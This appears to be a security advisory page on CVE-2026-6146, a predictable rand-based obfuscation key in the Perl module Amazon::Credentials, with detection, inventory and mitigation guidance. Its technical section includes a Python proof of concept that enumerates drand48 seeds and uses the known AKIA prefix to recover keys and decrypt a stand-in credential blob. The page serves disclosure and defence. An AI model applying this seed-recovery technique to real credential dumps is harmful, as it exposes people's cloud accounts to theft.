CVE-2026-6146 Overview
CVE-2026-6146 affects the Amazon::Credentials Perl module through version 1.2.0. The module obfuscates AWS credentials held in memory so that an object dump (Data::Dumper and the like) does not reveal them in clear. Before version 1.3.0 the 64-bit key for that obfuscation was derived from Perl's built-in rand function, a non-cryptographic generator whose output is fully determined by a small seed. An attacker who obtains an obfuscated credential blob can therefore enumerate the candidate keys, reverse the obfuscation and recover the plaintext credentials. The issue is tracked as CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG).
Critical Impact
Predictable obfuscation keys allow recovery of AWS access key IDs and secret access keys from process memory dumps, core files, log artifacts, or serialized objects. Long-lived IAM user keys recovered this way remain valid until they are rotated.
Affected Products
- Amazon::Credentials for Perl, versions through 1.2.0
- Applications and pipelines that depend on Amazon::Credentials to broker AWS credentials
- CPAN distributions bundling Amazon-Credentials releases prior to 1.3.0
Discovery Timeline
- 2026-05-11 - CVE-2026-6146 published to the National Vulnerability Database
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-6146
Vulnerability Analysis
The Amazon::Credentials module stores AWS access keys and secret keys in an obfuscated form so that a Data::Dumper or similar object dump does not trivially reveal them. The obfuscation is symmetric encryption under a 64-bit key generated at runtime from Perl's rand built-in. rand is not a cryptographic generator: since Perl 5.20 it is an in-interpreter drand48, a 48-bit linear congruential generator whose state is initialised from a 32-bit seed (srand keeps only 32 bits of its argument, and the automatic seed Perl picks when srand is never called is 32 bits as well; earlier Perls used the platform generator with seeds no larger). Every value rand returns, and so every key assembled from those values, is a deterministic function of that seed, which means the key can take at most 2^32 distinct values however many bits it nominally has. An attacker holding an obfuscated credential value enumerates the seed space, derives each candidate key, attempts the decryption and keeps the result that looks like a credential (AWS access key IDs are 20 uppercase alphanumeric characters beginning with AKIA or ASIA, which makes a cheap plausibility check). Knowledge of the seeding context, for instance a program that calls srand with a fixed or time-based value, shrinks the search further but is not required.
Root Cause
The root cause is the use of rand as the key source in the credential obfuscation routine. The nominal 64-bit key length does not help: the key carries no more entropy than the generator state it is derived from, and even a genuinely random 64-bit symmetric key would sit well below the 128-bit floor expected for confidentiality today. Version 1.3.0 replaces the rand-based derivation with a cryptographically suitable source. See the MetaCPAN Amazon Credentials Source for the vulnerable code path.
Attack Vector
Exploitation requires the attacker to obtain the obfuscated credential blob. Common paths include process memory captures, core dumps, crash reports, serialized objects written to disk, log files that include dumped object state, and error-reporting telemetry shared with third parties. With the blob in hand, the attacker enumerates candidate seeds, derives each key, decrypts, and keeps the candidate that yields a plausible AWS access key ID and secret access key. Nothing in this phase touches AWS, so the first signal a defender sees is usually the recovered credentials being used. They work directly against AWS APIs with whatever permissions the originating identity holds.
No verified public exploit code is available. The vulnerability is described in the OpenWall OSS-Security Discussion and the MetaCPAN Amazon Credentials Changes for version 1.3.0.
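The root cause and attack vector above, as an added Python model rather than code from Amazon::Credentials or any published exploit: the two generator functions reproduce the drand48 that Perl ships in util.c since 5.20, while the key packing (two rand() values in 8 bytes) and the repeating-key XOR are constructed stand-ins for the module's unspecified packing and cipher. The sample credential is AWS's documented example access key ID and the seed is arbitrary. The generic brute force is bounded by the 2^32 seeds; the known-plaintext variant uses the AKIA prefix to cut that to 2^16 trials by inverting one LCG step.

```python
"""Seed-space recovery of a key built from Perl's rand().

Added example for the root cause of CVE-2026-6146; NOT code from
Amazon::Credentials. perl_seed_state/perl_rand_step mirror Perl's own
drand48 (util.c, Perl >= 5.20). derive_key and xor_obfuscate are
constructed stand-ins for the module's unspecified key packing and
symmetric cipher, so the path blob -> candidate seeds -> decrypt ->
plausibility check can be run end to end offline.
"""

DRAND48_A = 0x5DEECE66D
DRAND48_C = 0xB
MASK48 = (1 << 48) - 1
SEED_LOW16 = 0x330E                      # low 16 bits of every initial state
A_INV = pow(DRAND48_A, -1, 1 << 48)      # multiplier is odd: invertible mod 2**48


def perl_seed_state(seed):
    """Perl_drand48_init_r: srand(EXPR) keeps only 32 bits of EXPR."""
    return (SEED_LOW16 + ((seed & 0xFFFFFFFF) << 16)) & MASK48


def perl_rand_step(state):
    """Perl_drand48_r: rand() returns new_state / 2**48."""
    return (state * DRAND48_A + DRAND48_C) & MASK48


def derive_key(seed):
    """Assumed key construction: pack('NN', int(rand(2**32)), int(rand(2**32))).
    int(state / 2**48 * 2**32) is exactly state >> 16."""
    s1 = perl_rand_step(perl_seed_state(seed))
    s2 = perl_rand_step(s1)
    return (s1 >> 16).to_bytes(4, "big") + (s2 >> 16).to_bytes(4, "big")


def xor_obfuscate(data, key):
    """Stand-in for the module's symmetric cipher; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_access_key_id(plain):
    """AWS access key IDs: 20 uppercase alphanumerics starting AKIA or ASIA."""
    return (len(plain) == 20 and plain[:4] in (b"AKIA", b"ASIA")
            and plain.isalnum() and plain.isupper())


def recover_seed_brute(blob, seed_lo, seed_hi):
    """Generic attack: the whole seed space is range(0, 1 << 32). The window
    arguments only keep the demonstration quick."""
    for seed in range(seed_lo, seed_hi):
        if looks_like_access_key_id(xor_obfuscate(blob, derive_key(seed))):
            return seed
    return None


def recover_seed_known_prefix(blob, prefix=b"AKIA"):
    """Known-plaintext shortcut: blob[:4] XOR the prefix reveals key[:4], the
    top 32 bits of the first drand48 state. Only its low 16 bits are unknown;
    undo one LCG step per guess and test the initial-state signature, which
    exactly one guess satisfies (low bits of s0 step through all 2**16 values)."""
    leaked_hi = int.from_bytes(xor_obfuscate(blob[:4], prefix), "big")
    for low in range(1 << 16):
        s1 = (leaked_hi << 16) | low
        s0 = ((s1 - DRAND48_C) * A_INV) & MASK48
        if s0 & 0xFFFF == SEED_LOW16:
            return s0 >> 16
    return None


if __name__ == "__main__":
    # Constructed sample: AWS's documented example access key ID, obfuscated
    # under the key a Perl process seeded with 0xDEADBEEF would produce.
    seed = 0xDEADBEEF
    blob = xor_obfuscate(b"AKIAIOSFODNN7EXAMPLE", derive_key(seed))
    found = recover_seed_known_prefix(blob)
    print(hex(found), xor_obfuscate(blob, derive_key(found)))
```

The brute-force path is a few billion key derivations, an offline job of hours at most on ordinary hardware rather than a cryptographic barrier, and the known-prefix path finishes instantly. Swapping the generator for an operating-system source (for example /dev/urandom via Crypt::URandom) removes the seed bottleneck, which is the class of change the 1.3.0 release describes.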
Detection Methods for CVE-2026-6146
Indicators of Compromise
- Unexpected AWS API calls from IP addresses or user agents that do not match the workload running Amazon::Credentials
- AWS CloudTrail entries showing access key usage outside expected regions, instance roles, or time windows
- Log files, crash dumps, or serialized Perl objects on disk containing obfuscated credential structures from Amazon::Credentials
Detection Strategies
- Inventory Perl environments and CPAN dependency manifests for Amazon-Credentials versions at or below 1.2.0
- Hunt CloudTrail and IAM Access Analyzer findings for anomalous usage of access keys that were ever handled by affected Perl applications
- Search file systems, ticketing systems, and log aggregation platforms for serialized credential objects that may have been exported with obfuscation intact
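One way to run the dependency inventory above against a project's manifests, as an added Python example that is not part of the page or of any CPAN tool: it reads a cpanfile and a Carton cpanfile.snapshot (both constructed inline) and reports whether the declared requirement excludes the affected releases and which release was actually resolved. It assumes this distribution's dotted three-part versions (1.2.0, 1.3.0), so comparison is on integer tuples; decimal CPAN versions such as 1.20 would need version.pm semantics.

```python
"""Find Amazon::Credentials requirements that still allow a vulnerable release.

Added example, not from the page or from any CPAN tool. Sample manifests are
constructed; the pathname author directory is a placeholder.
"""
import re

MODULE = "Amazon::Credentials"
DIST = "Amazon-Credentials"
FIXED = (1, 3, 0)

SAMPLE_CPANFILE = """\
requires 'Amazon::Credentials', '1.1.0';
requires 'Amazon::S3', '0.60';
"""

SAMPLE_SNAPSHOT = """\
# carton snapshot format: version 1.0
DISTRIBUTIONS
  Amazon-Credentials-1.2.0
    pathname: X/XX/XXXXXX/Amazon-Credentials-1.2.0.tar.gz
    provides:
      Amazon::Credentials 1.2.0
    requirements:
      Date::Format 0
"""

# cpanfile is Perl syntax: requires 'Mod', '>= 1.0';  or  requires "Mod" => "1.0";
_REQ_RE = re.compile(
    r"""requires\s+(['"])""" + re.escape(MODULE)
    + r"""\1\s*(?:,|=>)?\s*(?:(['"])([^'"]*)\2)?\s*;""")


def parse_version(text):
    """Dotted-decimal only (assumption stated above)."""
    return tuple(int(p) for p in text.strip().lstrip("v").split("."))


def cpanfile_requirement(text):
    """Version spec string for the module, '' if required without a version,
    None if the module is not required at all."""
    m = _REQ_RE.search(text)
    if not m:
        return None
    return m.group(3) or ""


def requirement_excludes_vulnerable(spec):
    """True only if every version the spec admits is >= FIXED. A bare version
    in cpanfile is a minimum, so '1.1.0' still admits 1.2.0."""
    if spec is None:
        return False
    for clause in spec.split(","):
        m = re.match(r"\s*(==|>=|>|<=|<|!=)?\s*v?([\d.]+)\s*$", clause)
        if not m:
            continue
        op = m.group(1) or ">="
        if op in (">=", "==", ">") and parse_version(m.group(2)) >= FIXED:
            return True
    return False


def snapshot_version(text):
    """Resolved distribution version from a Carton snapshot, or None."""
    m = re.search(r"^\s+" + re.escape(DIST) + r"-(\d[\d.]*)\s*$", text, re.M)
    return parse_version(m.group(1)) if m else None


def assess(cpanfile_text, snapshot_text):
    spec = cpanfile_requirement(cpanfile_text)
    resolved = snapshot_version(snapshot_text)
    return {
        "declared": spec,
        "declared_excludes_vulnerable": requirement_excludes_vulnerable(spec),
        "resolved": resolved,
        "resolved_vulnerable": resolved is not None and resolved < FIXED,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_CPANFILE, SAMPLE_SNAPSHOT))
```

The snapshot is the authoritative answer for a deployed tree; the cpanfile result tells you whether the next carton install could quietly reintroduce an affected release. Installed hosts without a snapshot can be checked with perl -MAmazon::Credentials -e 'print $Amazon::Credentials::VERSION'.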
Monitoring Recommendations
- Forward AWS CloudTrail, GuardDuty, and IAM events into a centralized analytics platform to baseline normal credential use
- Alert on first-seen source IP, ASN, or user agent for any AWS access key tied to systems running affected Perl tooling
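The first-seen alerting recommended above, as an added Python example that is not part of the page or of any AWS service: records use CloudTrail's field names, the sample records and the watch list are constructed, and the watch list is assumed to come from an inventory of access keys that hosts running affected Amazon::Credentials releases ever loaded. ASN would join the tracked attributes after an IP-to-ASN lookup, which is not shown.

```python
"""First-seen alerting on AWS access keys that affected Perl tooling handled.

Added example; sample data constructed. Records use CloudTrail field names.
"""
import gzip
import json
from collections import defaultdict

# Constructed watch list: access keys that affected Perl workloads handled.
WATCHED_KEYS = {"AKIAIOSFODNN7EXAMPLE"}

# Attributes whose first appearance for a watched key is worth an alert.
TRACKED = ("sourceIPAddress", "userAgent", "awsRegion")


def _rec(time, name, region, ip, ua, key, kind="IAMUser"):
    return {"eventTime": time, "eventName": name, "awsRegion": region,
            "sourceIPAddress": ip, "userAgent": ua,
            "userIdentity": {"type": kind, "accessKeyId": key}}


# Constructed CloudTrail-style records: a normal day for the Perl workload, an
# unrelated role session, then the same IAM user key used from a new network,
# client and region the following night.
SAMPLE_RECORDS = [
    _rec("2026-05-12T09:00:01Z", "GetObject", "eu-west-1", "10.20.30.40",
         "perl-workload/1.0 (constructed)", "AKIAIOSFODNN7EXAMPLE"),
    _rec("2026-05-12T09:05:44Z", "PutObject", "eu-west-1", "10.20.30.41",
         "perl-workload/1.0 (constructed)", "AKIAIOSFODNN7EXAMPLE"),
    _rec("2026-05-12T10:00:00Z", "DescribeInstances", "us-east-1", "198.51.100.9",
         "aws-cli/2.0 (constructed)", "ASIAEXAMPLEROLESESS1", kind="AssumedRole"),
    _rec("2026-05-13T02:15:00Z", "ListBuckets", "us-east-1", "203.0.113.7",
         "aws-cli/2.0 (constructed)", "AKIAIOSFODNN7EXAMPLE"),
    _rec("2026-05-13T02:16:30Z", "GetObject", "us-east-1", "203.0.113.7",
         "aws-cli/2.0 (constructed)", "AKIAIOSFODNN7EXAMPLE"),
]


def load_cloudtrail(path):
    """CloudTrail delivers gzipped JSON objects with a top-level Records list."""
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt") as fh:
        return json.load(fh)["Records"]


def detect_first_seen(records, watched, baseline_end):
    """Records up to baseline_end (ISO 8601 Z timestamps compare as strings)
    build a per-key baseline of values for each tracked attribute. Later
    records that introduce a new value for a watched key yield one alert per
    attribute. Returns a list of (accessKeyId, eventTime, attribute, value)."""
    seen = defaultdict(lambda: defaultdict(set))
    alerts = []
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        key = rec.get("userIdentity", {}).get("accessKeyId")
        if key not in watched:
            continue
        for attr in TRACKED:
            value = rec.get(attr)
            if rec["eventTime"] > baseline_end and value not in seen[key][attr]:
                alerts.append((key, rec["eventTime"], attr, value))
            seen[key][attr].add(value)
    return alerts


if __name__ == "__main__":
    for alert in detect_first_seen(SAMPLE_RECORDS, WATCHED_KEYS,
                                   "2026-05-12T23:59:59Z"):
        print("first-seen", *alert)
```

Build the baseline from a window you trust was before any dump or log left the host; a baseline that already contains the attacker's traffic learns it as normal. Each attribute alerts once per key, so the second night-time record above produces nothing new.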
- Track CPAN package upgrades through configuration management to confirm Amazon::Credentials reaches version 1.3.0 or later
How to Mitigate CVE-2026-6146
Immediate Actions Required
- Upgrade Amazon::Credentials to version 1.3.0 or later on every host, container image, and build pipeline
- Rotate any AWS access keys that were processed by affected versions, especially long-lived IAM user keys; treat them as exposed if a dump, log, or serialized object from the process may have left the host
- Purge crash dumps, debug logs, and serialized object files that may contain obfuscated credential payloads
- Prefer short-lived credentials sourced from IAM roles, IAM Identity Center, or STS over static access keys
Patch Information
The maintainer released Amazon-Credentials 1.3.0, which replaces the weak rand-based key generation with a cryptographically appropriate source. Review the upstream changelog at MetaCPAN Amazon Credentials Changes and pin the dependency to a version greater than or equal to 1.3.0 in cpanfile, Makefile.PL, or dist.ini.
Workarounds
- Where immediate upgrade is not possible, limit how far a blob can travel: disable core dumps for processes that load Amazon::Credentials (ulimit -c 0 or the service manager's equivalent), restrict ptrace and /proc/<pid>/mem access to those processes (kernel.yama.ptrace_scope on Linux), and keep crash reports local
- Disable verbose object dumping, Data::Dumper output, and stack-trace logging that may serialize credential objects
- Replace static AWS keys with instance profile or container role credentials so that any recovered blob has limited validity
# Configuration example: enforce a safe minimum version in cpanfile
requires 'Amazon::Credentials', '>= 1.3.0';
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


